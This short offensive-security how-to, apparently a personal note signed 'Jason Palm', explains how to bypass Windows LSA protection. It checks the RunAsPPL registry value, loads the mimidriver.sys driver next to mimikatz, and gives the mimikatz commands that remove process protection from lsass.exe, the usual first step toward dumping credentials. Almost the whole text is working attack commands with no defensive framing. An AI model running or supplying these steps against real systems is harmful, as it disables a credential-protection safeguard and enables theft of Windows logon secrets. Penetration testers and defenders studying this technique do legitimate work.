LSA Protection Bypass
Check if LSA runs as a protected process. The variable for “RunAsPPL” will be set to 0x1 in HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
Upload mimidriver.sys from the mimikatz repo to the same folder as mimikatz.exe, then import.
mimikatz # !+Remove the protection flags from the lsass.exe process.
mimikatz # !processprotect /process:lsass.exe /remove
Jason Palm 